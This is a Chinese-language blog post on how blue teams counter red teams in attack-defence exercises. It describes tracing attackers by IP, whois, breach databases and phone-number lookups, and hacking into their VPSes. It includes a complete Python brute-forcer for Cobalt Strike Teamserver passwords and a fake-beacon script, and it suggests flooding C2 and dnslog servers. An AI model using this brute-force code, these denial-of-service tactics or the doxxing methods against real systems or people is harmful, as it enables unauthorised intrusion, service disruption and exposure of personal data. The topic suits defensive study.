红蓝对抗系列之浅谈蓝队反制红队的手法一二

红蓝对抗系列之浅谈蓝队反制红队的手法一二

取证反查

针对ip 溯源一二

一般来说，红队大部分都是使用代理节点进行测试，假如我们捕获或者从样本里面分析拿到了真实ip ，那么以下操作场景就有用了，或者使用钓鱼反钓的方式获取到了真实ip。

1: ip > 来自创宇盾等节点流量ip

ip，假如前面还有一层云waf 、cdn厂商等，那么需要协调到提供服务的厂商，快速获取到云waf 或者cdn 之前的节点real_ip , 然后拿到了真实ip 就是下面的常规溯源操作。

2: ip> whois 、域名反查

ip ，初步可进行 whois 查询, 以及域名反查，查看历史的的解析、以及历史的ip拥有记录，运气好的话，假如攻击队成员使用的是自己的博客之类的vps 常用节点，那么很有可能能够通过这个手法进行溯源到相关人员。

3: ip > 探测端口，服务，进行反渗透vp

ip， 对该ip 进行端口探测、服务探测，进行反渗透。 一般来说红队的vps 都是在一些国内外的一些vps 主机供应商或者云服务供应商那边购买，假如是国内的话，可通过公安网警进行协助查水表，获取真实人员身份。 假如我们反渗透成功，那么可提取历史登入记录，历史ip，网络连接、进程、以及攻击工具、进程、内存镜像等方式进行取证分析。

4: Ip> 威胁情报

ip，对使用威胁情报进行综合分析，查看该ip他人对该ip 打的标签、历史解析记录、历史变更记录、以及该ip上面关联的相关样本，这些都能够获取到进行进一步分析。

5: Whois > 邮箱，qq， 手机号 > 社工库

通过ip的whois 获取到了相关人员的qq 或者邮箱或者手机号，那么可使用社工库，进行社工查询，比如twitter 的社工库机器人或者自行研究的社工库进行综合关联分析。

6: 手机号》 qq、微信、抖音、陌陌、脉脉等接口。

获取到了手机号，那么可通过qq 、微信、抖音、陌陌、脉脉等接口进行关联，一般而言获取到了手机号初步可通过这种简单易行的手法去溯源到红队人员。

7: 手机号》 ga数据、运营商数据。

当然，如果你有办法能通过ga资源，或者直接通过运营商拿数据，那就更好了。

8: Ip 反查相关推荐

Whois 查询：

http://ipwhois.cnnic.net.cn/

批量ip归属：http://ip.tool.chinaz.com/siteip

http://www.jsons.cn/ipbatch/

https://ip.tool.chinaz.com/

http://cip.cc/

威胁情报推荐地址

https://x.threatbook.cn/

样本查询地址

https://www.virustotal.com/

精准定位：

https://www.ipuu.net/

https://chaipip.com/aiwen.html

常见红队被反杀的姿势

1: 使用个人工作PC，且浏览器里面保存了Baidu、163、Sina等登陆凭据，攻击对抗过程中踩到蓝队蜜罐，被JsonP劫持漏洞捕获安全社交id，从而被溯源到真实姓名和所在公司。

2、可能是蓝方封禁IP太厉害的原因，红队个人或团队，使用自己的网站vps进行扫描，vps上含有团伙组织HTTPS证书、或VPS IP绑定的域名跟安全社交id对应，从而被溯源到真实姓名和所在公司。

3、部分攻击队写的扫描器payload里面含有攻击者信息，如使用了私有DNSlog、攻击载荷里面含有安全社交id、含有个人博客资源请求等。

4、投递的钓鱼邮件内木马样本被蓝队采集、逆向、反控C2C、溯源到个人信息。

5、虚拟机逃逸打到实体机，暴露个人全部真实信息的。

反制红队基础设施的骚操作

Cobalt Strike 反制

在防守里面，必不可少的是邮件钓鱼，或者社工钓鱼，一般来说钓鱼的样本无非这几种：

exe 、elf 可执行文件， 以及加了料的doc 类的宏木马。 一般而言，目前红队主要是通过Cobalt Strike 生成相关上线的shell ，那么针对Cobalt Strike 如何进行反制呢。

1 :批量上线钓鱼马，启几百个进程，ddos 红方的cs 端

假如我们获取到了红方的cs 样本，那么第一种方法可批量启几百个进程运行该样本（注意与真实环境隔离好，蓝队别自己送人头了），然后红方的cs 端几乎瘫痪，无法使用。

直接附github 地址：

https://github.com/Tk369/pluginS/blob/master/ll.py

2: 爆破cs 密码

此计名为：釜底抽薪。

一般而言，红队的cs设施为了多人运动，密码通常不会太复杂，有很大机会是弱口令为主，甚至Teamserver端口50050，那么针对cs 端控制端，可直接进行爆破密码，然后进行釜底抽薪

附cs 爆破密码脚本

#!/usr/bin/env python3

import time,socket,ssl,argparse,concurrent.futures,sys

MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()

parser.add_argument("host",
                    help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
                    help="Newline-delimited word list file")

args = parser.parse_args()

class NotConnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class DisconnectedException(Exception):
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class Connector:
    def __init__(self):
        self.sock = None
        self.ssl_sock = None
        self.ctx = ssl.SSLContext()
        self.ctx.verify_mode = ssl.CERT_NONE
        pass

    def is_connected(self):
        return self.sock and self.ssl_sock

    def open(self, hostname, port):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(self.sock)

        if hostname == socket.gethostname():
            ipaddress = socket.gethostbyname_ex(hostname)[2][0]
            self.ssl_sock.connect((ipaddress, port))
        else:
            self.ssl_sock.connect((hostname, port))

    def close(self):
        if self.sock:
            self.sock.close()
        self.sock = None
        self.ssl_sock = None

    def send(self, buffer):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self):
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        received_size = 0
        data_buffer = b""

        while received_size < 4:
            data_in = self.ssl_sock.recv()
            data_buffer = data_buffer + data_in
            received_size += len(data_in)

        return data_buffer

def passwordcheck(password):
    if len(password) > 0:
        result = None
        conn = Connector()
        conn.open(args.host, 50050)
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        if result == bytearray(b"\x00\x00\xca\xfe"): return password
        else: return False
    else: print("Do not have a blank password!!!")

passwords = []

if args.wordlist: passwords = open(args.wordlist).read().split("\n")
else: 
    for line in sys.stdin: passwords.append(line.rstrip())

if len(passwords) > 0:
    attempts = 0
    failures = 0

    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:

        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
        for future in concurrent.futures.as_completed(future_to_check):
            password = future_to_check[future]
            try:
                data = future.result()
                attempts = attempts + 1
                if data:
                    print ("Successful Attack!!!")
                    print("Target Password: {}".format(password))
            except Exception as exc:
                failures = failures + 1
                print('%r generated an exception: %s' % (password, exc))

else:
    print("Password(s) required")

3: 假上线

我们只需要发送心跳包，即可模拟上线，并且攻击者无法执行命令，只能干着急。

也就是模拟cs 上线，直接附代码。

使用时更改换IP或域名、port、cookie

# coding: utf-8

import re
import time
import requests

def heartbeat():
    url = "http://192.168.186.133:333/activity"
    headers = {
            'Cookie': 'IgyzGuIX0Jra5Ht45ZLYKyXWBnxfkNI3m6BOvExEPdWCuAv8fnY6HXKTygBOVdE34sDYusoDIjzHr/QR32mKsoVPb5NFMCHAtC7FLQUdSsZdufXjsd2dSqkGDcaZkcQYD1BssyjGZHTy42lT8oDpga3y1z5FMGRjobeksgaMX7M=',
            'Host': '192.168.186.133:333',
            'Accept': '*/*',
            'Connection': 'Keep-Alive',
            'Cache-Control': 'no-cache',
            'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727)'
        }
    resp = requests.get(url=url,headers=headers)
    text = resp.content.hex()
    return text

x = True
while x:
    text = heartbeat()
    lengs = len(text)
    # print(lengs, "    ", text)

    if '2f4320' in text and '000041' in text:
        print(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

        commeds = re.findall(r'2f4320(.*?)000041', text)
        for comm in commeds:
            commed = bytes.fromhex(comm).decode('utf-8')
            print(commed)
    time.sleep(5)

针对dnslog 的反制

此计可用混水摸鱼计策：乘其阴乱，利其弱而无主。随，以向晦入宴息。

解释： 通过流量设备审计到他人的dnslog 平台的url payload， 那么针对他的url payload 可进行反制。 一般而言，常见的公开的dnslog 平台，蓝队防守的时候可对常见dnslog 平台进行屏蔽即可，那么针对自行搭建的dnslog 平台有以下思路进行反制。

dnslog反制

可进行批量ping 捕获到的dnslog ，然后恶意扰乱他自行搭建的，恶意制造各种垃圾dnslog数据，让他无法获取到有效信息。直接让红队人员被迫废弃一个红队基础设施。 具体可以写个脚本比如站长之家之类的进行批量ping ，进行探测存活。

httplog反制

http log 同理， 使用爬虫节点，批量进行request 请求 捕获的http url 即可，这样红队的dnslog 平台几乎彻底报废。

以上，是作为防守蓝队，如何对红队的攻击行为，进行反制的一些思路总结。

总结

以上就是针对从取证反查、到对红队的基础设施进行反制的常规手法。

​

参考：

https://k8gege.org/p/40523.html

https://www.anquanke.com/post/id/219059

https://mp.weixin.qq.com/s/vZzDUZsqfAZR9VRDMLXxJA

https://mp.weixin.qq.com/s/AZwKkEeTErPeOrkVH2Mirw